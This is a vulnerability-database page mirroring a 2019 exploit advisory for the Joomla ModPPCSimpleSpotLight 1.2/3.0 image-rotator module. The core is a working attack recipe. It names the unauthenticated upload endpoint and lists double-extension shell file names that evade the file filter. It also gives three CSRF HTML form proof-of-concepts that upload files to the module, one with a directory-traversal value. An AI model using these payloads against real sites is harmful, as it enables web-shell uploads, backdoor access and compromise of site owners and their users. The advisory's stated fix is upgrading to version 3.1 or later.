Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla ModPPCSimpleSpotLight 1.2 / 3.0 CSRF / Shell Upload

🗓️ 04 Mar 2019 00:00:00Reported by KingSkrupellosType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 153 Views

Joomla ModPPCSimpleSpotLight 1.2/3.0 CSRF Shell Upload vulnerability in jQuery image rotato

Code
`###############################################################################  
  
# Exploit Title : Joomla ModPPCSimpleSpotLight Modules 1.2/3.0 CSRF Shell Upload  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 04/03/2019  
# Vendor Homepage : pixelpointcreative.com  
# Software Download Link : pixelpointcreative.com/joomla/downloads/category/40-simple-spotlight  
# Software Information Link : extensions.joomla.org/extension/simple-spotlight/  
bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,1547/Itemid,95/  
# Software Version : 1.2 and 3.0  
# Software Price Type : Free/Paid Download  
# Solution : Upgrade and Update to 3.1 or higher version  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
###############################################################################  
  
# Description about Software :  
***************************  
Simple spotlight is a jQuery image rotator with navigation for Joomla.  
  
###############################################################################  
  
# Impact :  
***********  
Joomla ModPPCSimpleSpotLight 1.2/3.0 versions is prone to an arbitrary file upload vulnerability.  
  
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can   
  
result in arbitrary code execution within the context of the vulnerable application.  
  
Weaknesses in this category are related to the management of permissions, privileges,   
  
and other security features that are used to perform access control.  
  
###############################################################################  
  
# Arbitrary File Upload / Unauthorized File Insertation / Shell Upload Backdoor Access Exploit :  
**********************************************************************************  
/modules/mod_ppc_simple_spotlight/elements/upload_file.php  
  
# Directory File Path :   
*********************  
/modules/mod_ppc_simple_spotlight/img/.......  
  
# Note : It is possible to upload shell files like this =>   
  
Sh3LL.php.gif - Sh3LL.php;.gif - Sh3LL.asp;.jpeg   
  
Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv   
  
.jpg .jpeg .gif .png  
  
It says : File Uploaded Successfully!  
  
###############################################################################  
  
Cross Site Request Forgery Exploits :  
**********************************  
  
CSRF Exploiter PoC 1 =>   
************************  
<form action="example.com/[PATH]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post" enctype="multipart/form-data" >  
<input name="Images" type="file" class="submit" size="80">  
<input type="submit" value="Upload !">  
</form>  
  
###############################################################################  
  
CSRF Exploiter PoC 2 =>  
*************************   
<form enctype="multipart/form-data"  
action="https://[VULNERABLESITE]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post">  
Your File: <input name="upload_file" type="file" /><br />  
<input type="hidden" name="dir_icons" value="../../../../">  
<input type="submit" value="upload" />  
</form>  
  
###############################################################################  
  
CSRF Exploiter PoC 3 =>  
*************************   
</script>  
<form name="newad" method="post" enctype="multipart/form-data" action="https://[VULNERABLESITE]/modules/mod_ppc_simple_spotlight/elements/upload_file.php" method="post">  
<table>  
<tr>  
<td>  
<input type="file" name="image">  
</td>  
</tr>  
<tr>  
<td>  
<input name="Submit" type="submit" value="Upload image">  
<input type="button" value="Close" onclick="javascript: refreshParent()">  
</td>  
</tr>  
</table>   
</form>  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Mar 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
joomlamodppcsimplespotlightcsrfshell uploadjqueryimage rotatorarbitrary file uploadunauthorized file insertationcross site request forgeryvulnerabilityexploitwebappsaccess control
153